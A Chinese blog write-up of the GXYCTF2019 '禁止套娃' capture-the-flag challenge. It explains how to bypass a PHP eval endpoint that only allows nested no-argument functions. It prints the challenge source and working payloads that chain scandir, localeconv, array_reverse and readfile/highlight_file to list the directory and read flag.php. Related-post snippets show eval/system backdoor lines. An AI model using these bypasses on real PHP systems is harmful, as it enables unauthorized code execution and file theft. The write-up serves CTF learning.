NO.2-5 [GXYCTF2019]禁止套娃(无参rce)

最新推荐文章于 2022-06-17 22:08:24 发布
最新推荐文章于 2022-06-17 22:08:24 发布
阅读量160 收藏
点赞数
分类专栏: BUUCTF RCE 文章标签: rce
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nigo134/article/details/119090428
版权
BUUCTF 同时被 2 个专栏收录
60 篇文章 0 订阅
订阅专栏
RCE
6 篇文章 0 订阅
订阅专栏

知识点:

localeconv() 函数返回一包含本地数字及货币格式信息的数组。
scandir() 列出 images 目录中的文件和目录。
readfile() 输出一个文件。
current() 返回数组中的当前单元, 默认取第一个值。
pos() current() 的别名。
next() 函数将内部指针指向数组中的下一个元素,并输出。
array_reverse()以相反的元素顺序返回数组。
highlight_file()打印输出或者返回 filename 文件中语法高亮版本的代码。

1.利用超全局变量进行bypass,进行RCE
2.进行任意文件读取

形式:

if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']);}

也就是说
正则匹配了一些关键字比如et导致很多函数不能用,getshell什么的基本不可能。

该正则,正是我们说的无参数函数的校验,其只允许执行如下格式函数

a(b(c())); a();

但不允许

a('123');

打开题目啥也没有,啥都试试吧。。
这里如果你扫描目录工具最够强大可以扫出来/.git

得到源码:

<?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) { if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) { if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) { // echo $_GET['exp']; @eval($_GET['exp']); } else{ die("还差一点哦!"); } } else{ die("再好好想想!"); } } else{ die("还想读flag,臭弟弟!"); } } // highlight_file(__FILE__); ?>

分析源码:

1.需要以GET形式传入一个名为exp的参数。如果满足条件会执行这个exp参数的内容。 2.过滤了常用的几个伪协议,不能以伪协议读取文件。 3.(?R)引用当前表达式,后面加了?递归调用。只能匹配通过无参数的函数。 4.正则匹配掉了et/na/info等关键字,很多函数都用不了。 5:eval($_GET['exp']); 典型的无参数RCE

既然getshell基本不可能,那么考虑读源码
看源码,flag应该就在flag.php
我们想办法读取

首先需要得到当前目录下的文件
scandir()函数可以扫描当前目录下的文件,例如:

<?php print_r(scandir('.')); ?>

那么问题就是如何构造
scandir('.')
这里再看函数:

localeconv() 函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是.
current() 返回数组中的当前单元, 默认取第一个值。
pos() current() 的别名。
这里还有一个知识点:

current(localeconv())永远都是个点

那么我们第一步就解决了:

 

print_r(scandir(current(localeconv()))); print_r(scandir(pos(localeconv()))); 
 

 

现在的问题就是怎么读取倒数第二个数组呢?
 看手册:
 

很明显,我们不能直接得到倒数第二组中的内容:
 三种方法:
1.array_reverse()
 以相反的元素顺序返回数组
 

?exp=print_r(array_reverse(scandir(current(localeconv()))))
2.array_rand(array_flip()) 
 

array_flip()交换数组的键和值
 

?exp=print_r(array_flip(scandir(current(localeconv())))); 
 

array_rand()从数组中随机取出一个或多个单元,不断刷新访问就会不断随机返回,本题目中scandir()返回的数组只有5个元素,刷新几次就能刷出来flag.php
 

?exp=print_r(array_rand(array_flip(scandir(current(localeconv()))))); 
 

3.session_id(session_start())
 

本题目虽然ban了hex关键字,导致hex2bin()被禁用,但是我们可以并不依赖于十六进制转ASCII的方式,因为flag.php这些字符是PHPSESSID本身就支持的。
 使用session之前需要通过session_start()告诉PHP使用session,php默认是不主动使用session的。
 session_id()可以获取到当前的session id。
 

因此我们手动设置名为PHPSESSID的cookie,并设置值为flag.php
 

 

那么我们最后一个问题:
 

如何读flag.php的源码
 

因为et被ban了,所以不能使用file_get_contents(),但是可以可以使用readfile()或highlight_file()以及其别名函数show_source()
 

 
 
view-source:http://172.21.4.12:10031/?exp=print_r(readfile(next(array_reverse(scandir(pos(localeconv())))))); 
 
 
?exp=highlight_file(next(array_reverse(scandir(pos(localeconv()))))); 
 
 
?exp=show_source(session_id(session_start())); 
 


                

        

        

    




    

      

        

            

              
                
                  nigo134
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    0
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          










                



	

		

			

				
					
HDFView-3.1.2-win10_64-vs16压缩套娃.zip

				
			

			

				

					03-17
				

			

		

		

			
				
《HDFView与HDF4/HDF5及NetCDF文件解析技术详解》  在IT行业中,数据存储和处理是至关重要的环节。为了高效地管理和分析大量复杂数据,科学家和工程师们开发了各种数据格式,其中HDF(Hierarchical Data Format)和...

			
		

	



                

              
                



	

		

			

				
					
别致的俄罗斯套娃广场.ppt

				
			

			

				

					03-13
				

			

		

		

			
				
【标题】:“别致的俄罗斯套娃广场”实际上是指一个以俄罗斯传统工艺品——套娃为主题的广场,这可能是一个文化景点或者公共艺术空间。这个PPT可能是关于该广场的介绍或展示,包含了其设计特色、历史背景以及与套娃...

			
		

	



                


  
              

                


	

		

			

				
					
医学-套娃状锰氧化合物纳米晶复合粒子及其制备方法.zip

				
			

			

				

					11-12
				

			

		

		

			
				
标题中的“医学-套娃状锰氧化合物纳米晶复合粒子及其制备方法”揭示了这个文件内容的核心,它涉及到的是一个与医学相关的科研成果,具体是关于一种特殊的锰氧化合物纳米晶复合粒子的结构设计和制造工艺。在医学领域...

			
		

	





	

		

			

				
					
俄罗斯套娃信封问题(java代码).docx

				
			

			

				

					04-13
				

			

		

		

			
				
### 俄罗斯套娃信封问题解析及Java代码实现  #### 问题背景与描述 俄罗斯套娃信封问题是一个经典的计算机科学问题,它涉及到如何找出一组信封中能互相嵌套的最大子序列。在这个问题中,每个信封由其宽度和高度来定义...

			
		

	



		

			
		



	

		

			

				
					
网赚APP的“俄罗斯套娃”游戏.docx

					
最新发布

				
			

			

				

					05-01
				

			

		

		

			
				
### 网赚APP的“俄罗斯套娃”游戏——揭秘其背后的运作机制  #### 一、网赚APP的兴起与目标群体  随着互联网技术的普及和发展,越来越多的网赚APP开始进入人们的视野,特别是对于中老年群体来说,这类APP似乎提供了...

			
		

	





	

		

			

				
					
[CISCN2019 总决赛 Day1 Web4]Laravel1

				
			

			

				

					nigo134的博客
				

				

					06-17
					
					897
					
				

			

		

		

			
				
反序列化漏洞laravel pop链的挖掘显而易见的考察反序列化漏洞,并且告诉了备份source.tar.gz,直接下载下来开始找pop链。反序列化的触发点一般为__wakeup()或者__destruct(),更多的是destruct,先找destruct。使用phpstrom,Ctrl+Shift+R查找function __destruct:通过逐个分析找到一个可以文件包含的链,
TagAwareAdapter类:

调用过程:__destruct() -> commit() -> invalidat

			
		

	





	

		

			

				
					
[安洵杯 2019]iamthinking

				
			

			

				

					nigo134的博客
				

				

					06-17
					
					706
					
				

			

		

		

			
				
thinkphp6.0反序列化漏洞一进来就发现forbiden,直接目录扫描一波~发现www.zip,下载下来开始代码审计:挺简单的就一个index.php控制器,代码大概意思将GET传入的payload参数进行发序列化,但是payload不能以O开头,妥妥的考反序列化漏洞,O是php对象序列化后的第一个字符,既然不能以O开头,那么就把对象放进一个数组里就行了,这样就是以a开头了从而绕过。接下来就是找pop链了,先看看thinkphp6.0有没有已知反序列化漏洞。 发现6.0刚好存在反序列化漏洞,网上随便搜

			
		

	





	

		

			

				
					
[羊城杯2020]easyphp

				
			

			

				

					nigo134的博客
				

				

					06-15
					
					551
					
				

			

		

		

			
				
1. .htaccess的利用.htaccess利用方式
.htaccess相关问题2.php://filter的利用关于php://filter在file_put_contents中的利用_bfengj的博客-CSDN博客 核心代码:


filename只能由点和字母组成,content不能有flag和file。乍一看挺简单的filename传a.php,content传再用蚁剑访问就行了。但事实是想多了,确实能够将木马写入a.php,也可以访问a.php,但......

			
		

	





	

		

			

				
					
NO.2-6 [GWCTF 2019]我有一个数据库

				
			

			

				

					nigo134的博客
				

				

					07-26
					
					168
					
				

			

		

		

			
				
该题考查cve-2018-12613-PhpMyadmin后台文件包含漏洞
使用御剑进行扫描发现phpmyadmin/目录,无需密码便可以进入
查看相关版本信息







百度一下发现phpmyadmin4.8.1版本文件包含漏洞,问题出在index.php的target参数位置




// If we have a valid target, let's load that script instead
if (! empty($_REQUEST['target'])
    &&amp..

			
		

	





	

		

			

				
					
NO.2-7 [BJDCTF2020]The mystery of ip

				
			

			

				

					nigo134的博客
				

				

					07-26
					
					133
					
				

			

		

		

			
				
SSTI模板注入:
之前也写过:https://www.cnblogs.com/wangtanzhi/p/12238779.html

SSTI模板注入:

模板注入涉及的是服务端Web应用使用模板引擎渲染用户请求的过程
服务端把用户输入的内容渲染成模板就可能造成SSTI(Server-Side Template Injection)

模板引擎

模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,用于网站的模板引擎就会生成一个标准的HTM

			
		

	





	

		

			

				
					
NO.5 [ACTF2020 新生赛]Include

				
			

			

				

					nigo134的博客
				

				

					07-19
					
					124
					
				

			

		

		

			
				
知识点

 ?file=flag.php 猜测文件包含漏洞

 php://filter与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,阻止其不执行。从而导致任意文件读取。

 php://filter 伪协议文件包含读取源代码,加上read=convert.base64-encode,用base64编码输出,不然会直接当做php代码执行,看不到源代码内容。

 php://input 伪协议 + POST发送PHP代码 (不行)

...

			
		

	





	

		

			

				
					
NO.2-4 [强网杯 2019]高明的黑客

				
			

			

				

					nigo134的博客
				

				

					07-26
					
					109
					
				

			

		

		

			
				
[强网杯 2019]高明的黑客 

访问压缩包内php文件,传入参数未报错且具有返回值

存在形如


$_GET['ganVMUq3d'] = ' ';
eval($_GET['ganVMUq3d'] ?? ' ');

$_GET['jVMcNhK_F'] = ' ';
system($_GET['jVMcNhK_F'] ?? ' ');

$_GET['cXjHClMPs'] = ' ';
echo `{$_GET['cXjHClMPs']}`;

思路:遍历文件查找未被置空入口

exp


imp

			
		

	





	

		

			

				
					
NO.2-8 [BJDCTF2020]ZJCTF,不过如此

				
			

			

				

					nigo134的博客
				

				

					07-26
					
					102
					
				

			

		

		

			
				
知识点

 php://input
 filter伪协议
 preg_replace() /e模式命令执行
 题目源码


<?php

error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "<br><h1&gt...

			
		

	





	

		

			

				
					
NO.1 [HCTF 2018]WarmUp

				
			

			

				

					nigo134的博客
				

				

					07-19
					
					96
					
				

			

		

		

			
				
mb_substr() 函数返回字符串的一部分,之前我们学过 substr() 函数,它只针对英文字符,如果要分割的中文文字则需要使用 mb_substr()。

注释:如果 start 参数是负数且 length 小于或等于 start,则 length 为 0。

payload:


?file=hint.php%253F../../../../../ffffllllaaaagggg

挺简单的,用多个../把hint.php%3f当成目录跳过,直接读取根目录下的ffffllllaaaagggg
代码

			
		

	





	

		

			

				
					
NO.16 [极客大挑战 2019]PHP

				
			

			

				

					nigo134的博客
				

				

					07-23
					
					88
					
				

			

		

		

			
				
知识点

__wakeup()函数用法:
wakeup()是用在反序列化操作中。unserialize()会检查存在一个wakeup()方法。如果存在,则先会调用__wakeup()方法
wakeup()漏洞就是与整个属性个数值有关。当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过wakeup的执行。

解题过程

网站的首页是一只可爱的猫猫,挪动鼠标猫猫会跟着转头,很好玩!



网页中提到了备份网站,因此可以尝试使用一个网站备份文件名的字典来进行爆破,发现网站中有www.zip文件。




			
		

	





	

		

			

				
					
NO.8 [ACTF2020 新生赛]Exec

				
			

			

				

					nigo134的博客
				

				

					07-19
					
					85
					
				

			

		

		

			
				
毫无过滤的命令执行....


			
		

	





	

		

			

				
					
abcde

				
			

			

				

					nigo134的博客
				

				

					07-25
					
					84
					
				

			

		

		

			
				
NO.35 [RoarCTF 2019]Easy Java


			
		

	





	

		

			

				
					
NO.3

				
			

			

				

					nigo134的博客
				

				

					07-19
					
					74
					
				

			

		

		

			
				
payload


?cat=dog

查看源码,发现源码泄露

传入cat = dog 即可得到flag


			
		

	





	

		

			

				
					
函数指针声明 入参 返参 func 套娃

				
			

			

				

					09-16
				

			

		

		

			
				
函数指针声明可以通过使用typedef来简化语法,并且可以通过...总的来说,通过使用typedef来声明函数指针类型,以及通过声明嵌套结构体来创建带有函数指针成员的结构体,可以更方便地使用和管理函数指针的入参和返参。

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值